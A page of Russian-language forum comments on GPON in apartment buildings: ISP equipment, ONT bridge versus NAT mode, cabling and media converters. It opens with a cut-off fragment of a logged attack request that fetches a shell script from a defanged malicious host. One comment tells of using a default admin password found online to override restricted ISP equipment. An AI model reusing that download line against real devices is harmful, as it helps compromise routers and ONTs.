    Host: {}  
    User-Agent: Wget(linux)  
    Content-Length: 287  
    Content-Type: application/x-www-form-urlencoded  
    -------------------------------------------------------------
    hxxp://domstates.su/gpon.sh  
    


    То есть судя по всему проблема в скриптах, которые показывают веб-интерфейс, а GPON тут лишь при том, что это оказалась прошивка к GPON ONT, хотя с тем же успехом могла бы быть к «обычному домашнему роутеру», IP-камере и умной лампе.
  • Технология GPON в многоквартирных домах – будущее интернет-провайдинга или маркетинговый пузырь?
    +2
    Далеко не все операторы готовы продать вам публичный ipv4 адрес.

    Некоторые из тех, кто готовы вам продать белый адрес вешают его на ONT и дают вам возможность прокинуть некоторые порты внутрь или указать внутренний ip для прокидования всего трафика, но в бридж его не переводят.

    У одного моего знакомого произошла примерно такая история: он подключил себе gpon, ему поставили ONT(в режиме NAT), он за ним разместил миркотик, но OTN переодически подвисал, приходилось ребутать. Доступ к ONT ему дали, но не полный (условно говоря переименовать SSID, пароль или настройки внутреннего DHCP можно, а поменять режим работы ONT на бридж нельзя). В саппорте ему ответили «нельзя и все». Где то в интернете он нашел «стандартный админский пароль» и с ним смог перевести этот ONT в режим бриджа, после чего жил счасливо.
    Через какое-то продолжительное время непонятно зачем пришли монтажники и заменили ему его ONT на «более новую и лучшую модель», которую тоже оказалось в режиме NAT и включить мост на ней нельзя было. Новая модель начала так же подвисать, как и старая, но при этом в интернетах он смог найти только кучу людей с вопросами «какой стандартный админский пароль?» и не одного ответа, все примерно с такими же проблемами (у кого-то ONT виснет, кто-то сильно хочет белый адрес именно на свой роутер повесить, кому-то просто хочется). Запросы в саппорт закончились снова «ничего переключить нельзя». От покупки медиаконвертора или ONT с алиэкспреса его удалось отговорить, а закончилось тем, что он настолько замучал саппорт, что к нему выслали человека для проверки оборудования, человек пришел, послушал его жалобы, кому-то позвонил и ONT оказался в режиме моста.

    А передать управление полностью они не могут, часть настроек подгружается с OLT через OMCI и иногда TR-069, то есть с инфраструктуры провайдера.
  • Технология GPON в многоквартирных домах – будущее интернет-провайдинга или маркетинговый пузырь?
    0
    Если хуавей и компьютер умеет Wi-fi 2,4 ГГц и 5 ГГц, то попробуйте выключить 5 ГГц, в некоторых ситуациях это может помочь (в частности 5ГГц хуже проникает через бетонные стены), так же иногда помогает выставление максимальной скорости подключение ниже, чем у вас согласует скорость сейчас автоматически (это лучше делать на ноутбуке\пк, что бы не страдали другие клиенты, если они есть).
  • Технология GPON в многоквартирных домах – будущее интернет-провайдинга или маркетинговый пузырь?
    0
    Не очень дальновидно с точки зрения провайдера.
    И соседей ваших уже по этой оптике не подключить, и однообразие нарушено (если стандартное подключение у них «оптика до коммутатора провайдера и медь до квартиры»). Я такие варианты видел только в случае подключения отдельностоящих зданий, в которых совершенно точно не появиться другие клиенты (коммерческая недвижимость с одним хозяином и отсутствием мест под аренду или частный сектор).
    Хотя не разу не удивлен, частенько видел как многие вещи делаются «по пути наименьшего сопротивления», совершенно не задумываясь о том, что решение «чуть сложнее» в итоге окажется удобней\выгодней\правильней.
  • Технология GPON в многоквартирных домах – будущее интернет-провайдинга или маркетинговый пузырь?
    0
    на ES3528-WDM по описанию похоже.
  • Технология GPON в многоквартирных домах – будущее интернет-провайдинга или маркетинговый пузырь?
    +1
    К сожалению далеко не все провайдеры идут на встречу и выполняют эту простую просьбу.
  • Технология GPON в многоквартирных домах – будущее интернет-провайдинга или маркетинговый пузырь?
    +2
    Это я описал путь кабеля от маршрутизатора до абонента по стоякам.
    не стоит так утрировать, во первых 100 метров — это максимум зафиксированный в стандарте(100Мб и гигабит), по факту сегменты обычно меньше, потому что 105м уже работают нестабильно, а провайдеры больше всего зарабатывают на тех, кто подключился и пользуется, а не жалуется постоянно в саппорт, вызывает монтажников и уходит к конкурентам. То есть самому провайдеру проще коммутатор к пользователям поближе подвинуть, если есть намеки на то, что сегмент может оказаться больше 100 метров (на этапе «проектирования узла» конечно, но с этим проблем быть не должно, обычно этим люди опытные занимаются, дома типовые, процессы отработаны не по одному разу. Конечно везде имеет место быть человеческий фактор, и возможно найдется идиот-монтажник, который лишние 50 метров смотает в узел и бросить в щитке, но ему объяснят почему так делать не стоит, как только заметят).

    Во вторых обычно в домах отдельная трасса под силовые кабеля и отдельная под слаботочку. И витуху в квартиру тащат либо через слаботочку, либо через свои стояки (специально проложенные провайдером, в котором кроме витой пары ничего нет).

    В третьих витая пара она именно витая за тем, что бы бороться с наводками, а еще и экранированная бывает.

    В конце концов если бы было все так плохо, как вы описываете, то само существование доступа в интернет по средствам витой пары в условиях многоквартирных домов было бы под вопросом. Никто бы не стал пользоваться этой технологией, если бы она не обеспечивала приемлемого качества.

    Зы витая пара обычно соединяет абонента не с маршрутизатором, а с коммутатором.
  • Технология GPON в многоквартирных домах – будущее интернет-провайдинга или маркетинговый пузырь?
    +1
    Медиаконвертер — грубо говоря переходник из оптики (не GPON, а «обычной оптики», той, которая «точка-точка») в медь (стандартный сетевой кабель, как ко всем компам подключается).

    Если пользователь думает «не хочу жить c ONT, у меня на него доступа нет, куплю себе медиаконвертер, воткну за ним микротик и буду пользоваться как я привык» то получается проблема. После втыкания оптики от GPON в медиаконвертер (который не предназначен для GPON) последний попытается что нить отправить в сторону провайдера.

    Мало того, что это не заработает, с большой долей вероятности это так же будет мешать работе «соседей, находящихся в одном сегменте с данным пользователем» (а таких соседей может быть до 127 абонентов). Причем скорей всего «мешать» будет значит, что и у «соседей» ничего не работает, потому что в нормальной ситуации все ONT общаются с провайдером по очереди, строго в «свое время», а необученный GPON'у медиаконвертер будет постоянно всех перебивать и оборудования провайдера будет получать сигнал от соседского ONT с наложенным на него сигналом медиаконвертера (тут стоит сделать ремарку о том, о том, что в оптике используются разные длины волн, разное оборудование может по разному реагировать на одно одни и те же действия и на практике могут быть нюансы, но в общем случае картина будет примерно такая).
    Причем провайдер ничего с этим сделать не может, кроме как «монтажники приезжают на место, находят проблемного абонента и просят его прекратить безобразие нарушать или физически отключают его»
  • Технология GPON в многоквартирных домах – будущее интернет-провайдинга или маркетинговый пузырь?
    +1
    Нормальные провайдеры до дома тоже тянут оптику, ставят оборудование на тех. этаже (или в чердаке\подвале), а до абонента тянут линк через слаботочку или через собственные стояки. То есть нормальной сети так же решительно пофиг на грозу как и GPON.
  • Технология GPON в многоквартирных домах – будущее интернет-провайдинга или маркетинговый пузырь?
    +1
    обычный — нельзя, он тупо не будет работать(если мы все еще про GPON). Воткнуть свой роутер после ONT конечно можно, но скорей всего вас не устроят настройки ONT, а поменять их вам никто не даст.